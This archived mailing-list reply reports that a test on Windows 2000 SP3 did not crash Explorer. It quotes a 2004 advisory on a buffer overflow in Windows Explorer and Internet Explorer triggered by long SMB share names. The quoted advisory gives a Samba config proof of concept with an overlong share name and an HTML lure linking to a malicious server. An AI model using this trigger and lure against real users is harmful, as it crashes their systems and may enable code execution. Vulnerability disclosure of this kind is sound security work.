lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20040426205555.11428.qmail@web12702.mail.yahoo.com>
From: dan57170 at yahoo.com (Daniel Regalado Arias)
Subject: Re: Microsoft's Explorer and Internet Explorer long share name buffer overflow.

Well, i have tested it in W2k with sp3 and explorer
didnt get crashed!!!!!!!

Well, i cant get into the share because a message
appears saying "share name not found"!!!!

But, explorer is OK.


 --- Rodrigo Gutierrez <rodrigo@...ellicomp.cl>
escribi?: > Sunday afternoon is a bit boring, and
weather sucks
> down here in Santiago,
> Chile so here we go...
> The vuln is attached in TXT format, I would be
> gratefull if someone could
> verify if it affects windows 2003 as well.
> 
> Rodrigo.-
> > Microsoft Explorer and Internet Explorer Long
Share
> Name Buffer Overflow.
> 
> 
> 
> Author: Rodrigo Gutierrez <rodrigo@...ellicomp.cl>
> 
> Affected: MS Internet Explorer, MS Explorer
> (explorer.exe) 
>           Windows XP(All), Windows 2000(All)
> 
> Not Tested: Windows 2003, Windows me, Windows 98,
> Windows 95
> 
> Vendor Status: i notified the vendor in the
> beginning of 2002, this
>                vulnerability was supposed to be
> fixed in xp service
>                pack 1 according to the vendors
> knowledge base article
>                322857.
> 
> Vendor url:
>
http://support.microsoft.com/default.aspx?scid=kb;en-us;322857
> 
> 
> 
> Background.
> 
> MS Explorer (explorer.exe) and MS Internet
> Explorer(IEXPLORE.EXE) are 
> core pieces of Microsoft Windows Operating Systems.
> 
> 
> 
> Description
> 
> Windows fails to handle long share names when
> accessing a remote 
> file servers such as samba, allowing a malicious
> server to crash the 
> clients explorer and eventually get to execute
> arbitrary code in the 
> machine as the current user (usually with
> Administrator rights in windows
> machines).
> 
> 
> 
> Analysis
> 
> In order to exploit this, an attacker must be able
> to get a user to connect 
> to a malicious server which contains a share name
> equal or longer than 300
> characters, windows wont allow you to create such a
> share, but of course samba 
> includes the feature ;).   After your samba box is
> up and running create a 
> share in you smb.conf :
> 
> 
> 
> #------------ CUT HERE -------------
> 
>
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
> comment = Area 51
> path = /tmp/testfolder
> public = yes
> writable = yes
> printable = no
> browseable = yes
> write list = @trymywingchung
> 
> #------------ CUT HERE -------------
> 
> 
> After your server is up, just get to your windows
> test box and get to the
> start menu > run > \\your.malicious.server.ip.,
> plufff, explorer will crash
> :).
> 
> Social Engineering:
> 
> <a href="\\my.malicious.server.ip">Enter My 0day
> sploit archive</a>
>  
> 
> 
> Workaround.
> 
> From your network card settings disable the client
> for Microsoft networks 
> until a real fix for this vulnerability is
> available.
>  

_________________________________________________________
Do You Yahoo!?
Informaci?n de Estados Unidos y Am?rica Latina, en Yahoo! Noticias.
Vis?tanos en http://noticias.espanol.yahoo.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ